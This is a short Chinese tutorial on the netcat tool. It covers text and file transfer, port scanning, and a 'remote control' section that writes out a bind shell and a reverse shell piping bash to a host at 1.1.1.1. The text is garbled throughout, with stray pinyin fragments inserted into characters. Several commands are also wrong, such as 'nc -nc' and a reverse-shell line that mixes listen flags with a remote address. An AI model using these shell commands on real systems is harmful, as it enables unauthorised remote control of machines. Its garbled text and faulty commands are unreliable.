Netcat（Linux下NC命令）主要用途：

1.掃描制定ip端口情況。

2.端口監(jiān)聽，端口轉發(fā)。

3.提交自定義數(shù)據(jù)包。

4.遠程控制。

1.netcat 傳輸文本信息

kali pc1: ?作為服務端，先打開端口，例如333號端口，代碼如下：

nc -lp 333

kali pc2:作為客戶端，打開對應端口，并連接對方IP地址：

nc -nv (server ip)? 333

2.netcat 傳輸文件

pc1:作為服務機，先打開端口，例如333號，然后將文件重定向：

nc -l? -p 333 > lsof.txt

pc2：作為客戶機，將傳輸過來的文件寫入：

lsof | nc -nc 192.168.170.131 333 -q 1.

3.端口掃描

nc -vnzu (ip address)? 端口號

4.遠程控制（重點）(控制為雙向的)

正向：

A:

nc -lp 333 -c bash

相當于打開 333號端口

B：

nc 1.1.1.1 ?333

相當于連接333號端口，此時B控制A。

反向：

A:

nc -lp 333

B:

nc -lp 1.1.1.1 333 -c bash

主要參數(shù)：

options:

-d ? ? ? ? ? ? ?無命令行界面,使用后臺模式

-e prog ? ? ? ? ?程序重定向 [危險!!]

-g gateway ? ? ? 源路由跳躍點, 不超過8

-G num ? ? ? ? ?源路由指示器: 4, 8, 12, ...

-h ? ? ? ? ? ? ?獲取幫助信息

-i secs ? ? ? ? ? 延時設置,端口掃描時使用

-l ? ? ? ? ? ? ? 監(jiān)聽入站信息

-L ? ? ? ? ? ? ?監(jiān)聽知道NetCat被結束(可斷開重連)

-n ? ? ? ? ? ? ?以數(shù)字形式表示的IP地址

-o file ? ? ? ? ? 使進制記錄

-p port ? ? ? ? ?打開本地端口

-r ? ? ? ? ? ? ? 隨機本地和遠程的端口

-s addr ? ? ? ? ?本地源地址

-t ? ? ? ? ? ? ? 以TELNET的形式應答入站請求

-u ? ? ? ? ? ? ?UDP 模式

-v ? ? ? ? ? ? ? 顯示詳細信息 [使用=vv獲取更詳細的信息]

-w secs ? ? ? ? ?連接超時設置

-z ? ? ? ? ? ? ? I/O 模式 [掃描時使用]

端口號可以是單個的或者存在一個范圍: m-n [包含值]。